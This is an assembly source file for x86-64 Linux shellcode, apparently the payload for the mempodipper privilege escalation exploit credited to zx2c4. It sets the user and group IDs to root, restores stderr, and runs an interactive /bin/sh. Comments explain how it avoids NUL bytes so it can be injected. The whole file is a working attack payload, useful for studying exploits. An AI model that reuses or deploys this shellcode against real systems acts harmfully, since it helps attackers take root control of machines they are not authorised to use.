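BITS 64
; x86-64 Linux shellcode (NASM syntax):
;   setuid(0); setgid(0); dup2(6, 2); execve("/bin/sh", ["/bin/sh", "-i", NULL], NULL)
;
; Intended to drop into an interactive root shell from a privileged context.
; fd 6 is assumed to hold a copy of the original stderr saved by the
; mempodipper harness before the exploit ran; it is put back on fd 2 so the
; shell's error output is visible again.
;
; The code appears to be written to contain no 0x00 byte in its encoding
; (8-bit immediates, '//bin/sh' shifted right by 8 instead of a NUL-terminated
; literal). Re-check with `nasm -f bin` plus a hexdump after any edit.
;
; Syscall ABI: number in rax, args in rdi, rsi, rdx; `syscall` clobbers rcx and
; r11 and returns the result in rax (negative = -errno). Return values are not
; checked: a failed setuid/setgid still falls through to execve, and if fd 6 is
; not open dup2 fails with EBADF and stderr simply stays closed.
;
; Originally by zx2c4. Syscall numbers are named and rax is cleared before
; every `mov al` so a stale high half of rax (unknown on entry, -errno after a
; failed call) cannot turn the next syscall number into garbage.

SYS_DUP2        equ 0x21
SYS_EXECVE      equ 0x3b
SYS_SETUID      equ 0x69
SYS_SETGID      equ 0x6a

SAVED_STDERR_FD equ 6                   ; where the harness stashed the real stderr
STDERR_FILENO   equ 2

; setuid(0) — `mov al` writes only the low byte, so clear all of rax first
        xor     edi, edi                ; uid = 0 (32-bit write zero-extends to rdi)
        xor     eax, eax
        mov     al, SYS_SETUID
        syscall

; setgid(0)
        xor     edi, edi                ; gid = 0
        xor     eax, eax                ; do not inherit setuid's 0 / -errno result
        mov     al, SYS_SETGID
        syscall

; dup2(SAVED_STDERR_FD, STDERR_FILENO)
        push    SAVED_STDERR_FD         ; push imm8 / pop: full 64-bit load, no NUL byte
        pop     rdi
        push    STDERR_FILENO
        pop     rsi
        xor     eax, eax
        mov     al, SYS_DUP2
        syscall

; execve("/bin/sh", ["/bin/sh", "-i", NULL], NULL)
        mov     rbx, '//bin/sh'         ; 8-byte literal, little-endian
        shr     rbx, 8                  ; drop one '/' -> "/bin/sh\0" without a NUL in the code
        push    rbx
        mov     rdi, rsp                ; rdi = path

        xor     ebx, ebx
        mov     bx, '-i'                ; rbx = "-i\0...", upper bytes already zero
        push    rbx
        mov     rcx, rsp                ; rcx = &"-i"

        xor     eax, eax                ; rax = NULL terminator; also the base for the number below

; argv is built in place on the stack: push in reverse so rsp ends at argv[0]
        push    rax                     ; argv[2] = NULL
        push    rcx                     ; argv[1] = "-i"
        push    rdi                     ; argv[0] = "/bin/sh"
        mov     rsi, rsp                ; rsi = argv

        xor     edx, edx                ; envp = NULL
        mov     al, SYS_EXECVE          ; rax is still 0, so the low byte alone is exact
        syscall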